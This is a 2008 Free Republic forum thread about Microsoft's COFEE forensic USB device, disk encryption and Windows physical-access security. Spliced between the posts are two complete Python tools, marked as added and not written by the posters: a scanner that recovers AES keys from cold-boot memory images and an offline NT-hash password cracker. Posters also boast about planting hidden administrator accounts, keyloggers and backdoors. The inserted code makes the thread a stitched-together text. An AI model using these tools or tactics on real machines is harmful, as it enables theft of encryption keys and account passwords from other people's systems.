Posted on 05/02/2008 5:02:14 PM PDT by Dawnsblood
Last summer, Microsoft Corporation quietly introduced a powerful tool for getting past security on laptops and PCs running the Windows operating system (which about 90 percent do). The device is a USB thumb drive called COFEE (Computer Online Forensic Evidence Extractor). When you capture an enemy computer, you plug in COFEE and then use over a hundred software to quickly get whatever information is on the machine. COFEE can quickly reveal passwords, decrypt files, reveal recent Internet activity and much more. A lot of this can be done without COFEE, but with the Microsoft device, intelligence collection is a lot faster.
Microsoft has distributed thousands of COFEE devices to police and military intelligence personnel in the United States, and some foreign countries. COFEE was developed mainly to assist the investigation of Internet based crime. But military intelligence operators find it very useful in uncovering enemy plans. Islamic terrorists love their laptops, and never go killing without them.
And that is why naughty stuff should be done in Linux.
PING!
It is really quite easy to disable USB drives on a Windows machine. It’s just a few registry entries, and then this device would be useless without an admin account on the target machine.

So you see Stanley, we don't need you.
Does anyone think it unwise to alert the “Evil Doers” that Mr. Softee might be on to them?
Microsoft has distributed thousands of COFEE devices to police and military intelligence personnel in the United States, and some foreign countries.
Any device that was distributed “by the thousands” to police and military, has almost certainly been obtained by criminal organizations by now
It seems that most of Bill’s recent speeches contained something or other about identifying/monitoring individual users (e.g., personal handwriting signature recognition by tablets, tabletops,...).
This COFEE software has to be available on the Internet by now. I want to download a copy.
All of the really good USB exploits for Windows operate at the BIOS on the motherboard. I have yet to test a really good Windows port security program that could withstand rudimentary hacking.
I don't really care what you've done with your registry entries. If I can get physical access to your computer I own the box. If you are connected to the network, I own the network. I can create hidden Administrator accounts on every Windows device your computer "sees" on the network in a matter of seconds. Exploitation of trust relationships and escalation of privileges is trivial in Windows.
You don't even need an exploit to do this. You can buy WinKey from PassAware and do the same thing with a USB drive, DVD, or CD. The only difference is that you will make log entries, leave tracks showing that you did it, the machine will require a reboot, and the process takes minutes instead of seconds.
BINGO!
Poor writing skills aside, there is no back door here. It automates commands that would normally have to be entered by hand on a logged-in computer. I’ll grant there may be a rainbow brute force cracker, but those have been freely available for years now.
Much ado about nothing, but y’all can feel free to enjoy the knot in your panties.
If the USB device is bootable, as long as it can read the filesystem, it doesn’t matter if it’s a Windows box, Linux machine, Apple, BSD. As long as the filesystem isn’t encrypted, you can read it. And if you are from NSA you can read anything, encrypted or not.
Jack
I believe the point was this tech eventually falling into the hands of ID and data thieves....
That would be the government snoops who have no inherent right to your information.
The 4th amendment states the people shall be secure in...their papers...; oh, silly me, I forgot the Bill of Rights is only a piece of paper.
There is a back door into EVERY program and operating system. Programmers can't help it. They are nosy.
I can only assume, but I'm most certain they boot from this device and it can target the local hard drives while the host OS is offline. Just like accessing files with a 'live CD'.
It is really quite easy to disable USB drives on a Windows machine. It’s just a few registry entries, and then this device would be useless without an admin account on the target machine.
Except that the registry entries you mention are only relevant if you've booted into the OS on the machine. Devices like this, and other approaches like bootable CDs, have their own OS on them.
A necessary, but not sufficient, condition to security is to control physical access to the machine.
My corporate laptop has an encrypted C: drive and has the USB port disabled.
If you got my laptop when it was booted, and put a USB stick in the port, the filesystem wouldn’t mount. You would have to type in a valid ID and password to get access through the keyboard. You get three tries before the account is locked.
If you got my laptop when it was not booted, you might be able to boot from the USB port, but then how would you read the encrypted C: drive?
“you plug in COFEE and then use over a hundred software”
I guess English isn’t this person’s first language.
This is an official corporate secure laptop.
I have no idea how secure it really is, I haven’t tried to crack it myself. I think you can get a backdoor to the encryption from the vendor.
If you got my laptop when it was not booted, you might be able to boot from the USB port, but then how would you read the encrypted C: drive?
There was a technique discovered that involves freezing the memory chips of a computer with an encrypted HD, and moving them to another computer to be analyzed. I believe they were able to recover the encryption keys stored in memory from computers that had been powered off for as long as 20 minutes.
When you encrypt the HD, the operating system has to decrypt it. In order to do that it needs the keys in working memory. RAM is technically volatile memory, but it does exhibit some persistence. Freezing the chips seems to extend that period of persistence considerably.
I believe that's where this tool from MS could be stopped.
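The key-recovery step the post above describes (pull the disk-encryption key out of a RAM image) can be shown with a simplified form of the key-schedule search used in the cold boot research. Software AES keeps its expanded round keys in memory right after the 16-byte key, so a scanner can test every 16-byte window by expanding it and comparing the result with the 160 bytes that follow; a few decayed bits in the schedule are tolerated by counting mismatches instead of demanding equality. This is an added example and not code from the poster or the researchers. The memory image is constructed: random filler with a schedule planted at offset 1000 and a bit-damaged copy at offset 3000, using the FIPS-197 Appendix A.1 example key as the stand-in for the victim's key. The assumption that the key is AES-128 and that its schedule is contiguous is built in; other ciphers and key sizes would need their own expansion routine.

```python
import random


def build_sbox():
    """Rijndael S-box computed from GF(2^8) arithmetic, so no hand-typed 256-entry table."""
    sbox = [0] * 256
    rotl8 = lambda x, n: ((x << n) | (x >> (8 - n))) & 0xFF
    p = q = 1                      # invariant: p * q == 1 in GF(2^8)
    while True:
        p = (p ^ (p << 1) ^ (0x1B if p & 0x80 else 0)) & 0xFF   # p *= 3
        q ^= q << 1                                             # q /= 3 (i.e. q *= 0xF6)
        q ^= q << 2
        q ^= q << 4
        q &= 0xFF
        if q & 0x80:
            q ^= 0x09
        affine = q ^ rotl8(q, 1) ^ rotl8(q, 2) ^ rotl8(q, 3) ^ rotl8(q, 4)
        sbox[p] = affine ^ 0x63
        if p == 1:
            break
    sbox[0] = 0x63                 # 0 has no inverse and is defined separately
    return sbox


SBOX = build_sbox()


def expand_key(key):
    """AES-128 key expansion (FIPS-197 section 5.2): 16-byte key -> 176-byte schedule."""
    assert len(key) == 16
    w = [list(key[i:i + 4]) for i in range(0, 16, 4)]
    rcon = 0x01
    for i in range(4, 44):
        t = w[i - 1][:]
        if i % 4 == 0:
            t = [SBOX[b] for b in t[1:] + t[:1]]   # RotWord, then SubWord
            t[0] ^= rcon
            rcon = (rcon << 1) ^ (0x11B if rcon & 0x80 else 0)
        w.append([w[i - 4][j] ^ t[j] for j in range(4)])
    return bytes(b for word in w for b in word)


def find_aes128_keys(image, max_errors=0):
    """Scan a RAM image for AES-128 keys.

    The giveaway is the expanded schedule, not the key itself: for every
    16-byte window, expand it and compare with the 160 bytes that follow.
    max_errors tolerates bytes corrupted by DRAM decay in the round keys
    (the 16 key bytes themselves must be intact for this simple version).
    Returns a list of (offset, key, mismatched_bytes).
    """
    hits = []
    for off in range(len(image) - 176 + 1):
        candidate = image[off:off + 16]
        schedule = expand_key(candidate)
        errors = sum(1 for x, y in zip(schedule[16:], image[off + 16:off + 176]) if x != y)
        if errors <= max_errors:
            hits.append((off, candidate, errors))
    return hits


# Constructed sample "memory image" (not a real capture): random filler with a
# key schedule planted at offset 1000 and a bit-decayed copy at offset 3000.
# SAMPLE_KEY is the FIPS-197 Appendix A.1 example key, standing in for the
# victim's disk-encryption key.
SAMPLE_KEY = bytes.fromhex("2b7e151628aed2a6abf7158809cf4f3c")


def build_sample_image(size=4096):
    rng = random.Random(2008)
    image = bytearray(rng.getrandbits(8) for _ in range(size))
    schedule = expand_key(SAMPLE_KEY)
    image[1000:1176] = schedule
    decayed = bytearray(schedule)
    decayed[40] ^= 0x01        # two single-bit errors in the round keys, as decay would cause
    decayed[100] ^= 0x80
    image[3000:3176] = decayed
    return bytes(image)


if __name__ == "__main__":
    img = build_sample_image()
    for tolerance in (0, 2):
        for off, key, errs in find_aes128_keys(img, max_errors=tolerance):
            print(f"tolerance={tolerance}: key {key.hex()} at offset {off} ({errs} corrupted bytes)")
```

With tolerance 0 only the intact copy at offset 1000 is reported; with tolerance 2 the decayed copy at offset 3000 is recovered as well, which is the whole point of the freezing trick: the longer the chips hold their contents, the fewer errors the search has to absorb.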
How easy is it to break True Crypt encryption?
How easy is it to break the Dell - IBM/Hitachi full drive encryption without remounting the platters?
If I’m the NSA, I’d read your encrypted C drive :)
Heck, the vendor can do that. This is corporate encryption. No corporation would want to buy a product with no backdoors.
and then this device would be useless without an admin account on the target machine.
Like that's hard to get.
Well, that, and the fact that your hard drive ISN'T paper. So, you know, obviously 4A shouldn't apply. ;-)
I got to get one of those!
I don't need the USB drive to mount. I also don't need keyboard access. The tools and scripts will install the hidden Administrator accounts and backdoors in non-standard file locations without creating system log entries or otherwise alerting an Intrusion Detection System (IDS) or Systems Administrator.
The really sophisticated hacks will use pseudo-random number generators to hide the Admin accounts and backdoors in the disk free space. Of course, if you regularly wipe disk free space, you could undo my work.
If you got my laptop when it was not booted, you might be able to boot from the USB port, but then how would you read the encrypted C: drive?
Again, I don't need the machine to boot into Windows. I don't even need Windows to be running. Everything happens at the BIOS and below. I just get complete access to Windows when it is running.
You read an encrypted hard drive the same way you do forensics on any hard drive. Make an image of the disk, take it offline and use one of the many cracking programs available on the hash file.
Alternatively, leave a hidden Administrator account, a keystroke logger and a backdoor. Wait until you log in again to record and recover the password.
Your faith in commercial encryption is touching but naive. Not that encrypting data at rest is a bad idea, but there is no silver bullet solution for computer and network security.
Properly securing a network takes a combination of people, processes, and technology. When you do it, the bottom line doesn't contain too many zeros for most organizations, but too many commas.
However, to a sophisticated enough threat, if you only partially pay the bill, it's as if your network is still wide open.
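The offline step the post above describes (image the disk, then run cracking programs against the hash file) and the "rainbow brute force cracker" mentioned earlier both work on Windows account hashes because the NT hash is an unsalted MD4 of the UTF-16LE password: hash a wordlist once and every target can be looked up, which is exactly what a rainbow table precomputes. The example below is added here and is not the poster's code. It carries its own MD4 (hashlib's md4 is optional in modern OpenSSL builds), parses a constructed pwdump-style hash file, and runs a dictionary lookup against it; the users, passwords and wordlist are all made up for the example. It covers the account-hash case that the thread's cracking tools target; whether a volume's encryption key itself can be attacked the same way is the separate question the thread goes on to argue.

```python
import struct


def _rotl32(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data):
    """MD4 (RFC 1320) in pure Python, so the example runs without OpenSSL's optional md4."""
    msg = bytearray(data)
    msg.append(0x80)
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", len(data) * 8)
    A, B, C, D = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = A, B, C, D
        for i in range(16):                                   # round 1
            s = (3, 7, 11, 19)[i % 4]
            a, b, c, d = d, _rotl32((a + F(b, c, d) + X[i]) & 0xFFFFFFFF, s), b, c
        for i in range(16):                                   # round 2
            k, s = (i % 4) * 4 + i // 4, (3, 5, 9, 13)[i % 4]
            a, b, c, d = d, _rotl32((a + G(b, c, d) + X[k] + 0x5A827999) & 0xFFFFFFFF, s), b, c
        for i in range(16):                                   # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            s = (3, 9, 11, 15)[i % 4]
            a, b, c, d = d, _rotl32((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & 0xFFFFFFFF, s), b, c
        A, B, C, D = ((A + a) & 0xFFFFFFFF, (B + b) & 0xFFFFFFFF,
                      (C + c) & 0xFFFFFFFF, (D + d) & 0xFFFFFFFF)
    return struct.pack("<4I", A, B, C, D)


def nt_hash(password):
    """Windows NT hash: MD4 over the UTF-16LE password. No salt, no iteration count."""
    return md4(password.encode("utf-16le")).hex()


def parse_pwdump(text):
    """Yield (user, nt_hash_hex) from pwdump-style lines: user:RID:LMhash:NThash:::"""
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) >= 4 and len(parts[3]) == 32:
            yield parts[0], parts[3].lower()


def crack_dump(dump_text, wordlist):
    """Offline dictionary attack on an extracted hash file.

    Because NT hashes are unsalted, the wordlist is hashed once and every
    target is a dictionary lookup; a rainbow table is the same precomputation,
    compressed. Returns {user: password or None}.
    """
    table = {nt_hash(word): word for word in wordlist}
    return {user: table.get(h) for user, h in parse_pwdump(dump_text)}


# Constructed sample hash file (not from a real machine). The LM field holds the
# well-known value for "LM hash disabled".
LM_EMPTY = "aad3b435b51404eeaad3b435b51404ee"
SAMPLE_DUMP = "\n".join(
    f"{user}:{rid}:{LM_EMPTY}:{nt_hash(pw)}:::"
    for user, rid, pw in [("Administrator", 500, "password"),
                          ("Guest", 501, ""),
                          ("svc_backup", 1001, "Tr0ub4dor&3")]
)
SAMPLE_WORDLIST = ["123456", "password", "letmein", "qwerty", "Summer2008", ""]


if __name__ == "__main__":
    for user, found in crack_dump(SAMPLE_DUMP, SAMPLE_WORDLIST).items():
        print(f"{user}: {found!r}" if found is not None else f"{user}: not in wordlist")
```

The two accounts with dictionary passwords fall immediately and the third stays unknown, which is the practical shape of an offline attack: it costs the attacker nothing per guess once the hash file is in hand, and only the password's absence from the wordlist protects it.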
I’d be interested in both of your assessments of Truecrypt.
Much ado about nothing, but y’all can feel free to enjoy the knot in your panties.
Well, it's good to know that all passwords and everything else is wide open to anyone who logs into a Windows box, even without administrator privs. Kinda puts the "security" on said computers into perspective doesn't it?
It’s been obvious for a long time that nothing can stop the police from reading anything they please. Unless there is a real life Cryptonomicon storehouse somewhere.
You knew you were full of crap when you typed that, so why did you bother?
That's rich. A Windows apologist accusing someone of being full of crap. LOL.
As always, the answer is: "It depends."
What are you trying to do? How does it fit in your larger security scheme? What other weaknesses or avenues of approach are available to the threat?
Truecrypt is open source, supports multiple encryption methods, is cross-platform, and there is no readily available backdoor of which I am aware.
If you are encrypting thumb drives and other portable media it is probably a good choice. I wouldn't bet the ranch on the "hidden volume" feature against a skilled computer forensics specialist with time, money, and motivation. They may not break the encryption right away, but they will soon realize that there is something else there.
Like every other form of encryption it is susceptible to brute force and can eventually be broken.
In all likelihood other weaknesses in your device or network will provide the threat with access before they brute force Truecrypt.
Just my $0.02 worth.
I am not so much concerned about the government’s ability to break the Dell boot up password or IBM hard drive control encryption, or beyond that my True Crypt volume as they would have no need. It’s not as if I am sending tens of thousands of dollars to Islamic terrorist groups, or anyone else for that matter so they would not need my bank account or credit card info.
I am only concerned about the for fun or for profit hacker. With the Dell boot up protection you can’t boot from anything including a CD or a USB drive - so I think you have to break it to get access. I understand Dell will not release the back door for the BIOS or the hard drive without proof of ownership, but I suspect there are programs out there to break it. But once that’s done on mine you still have to deal with the True Crypt volume. It does not have a back door. It uses very secure algorithms. It does not write any info to the page file. It would seem like it would be way too much work for anyone except the NSA.
Disclaimer: Opinions posted on Free Republic are those of the individual posters and do not necessarily represent the opinion of Free Republic or its management. All materials posted herein are protected by copyright law and the exemption for fair use of copyrighted works.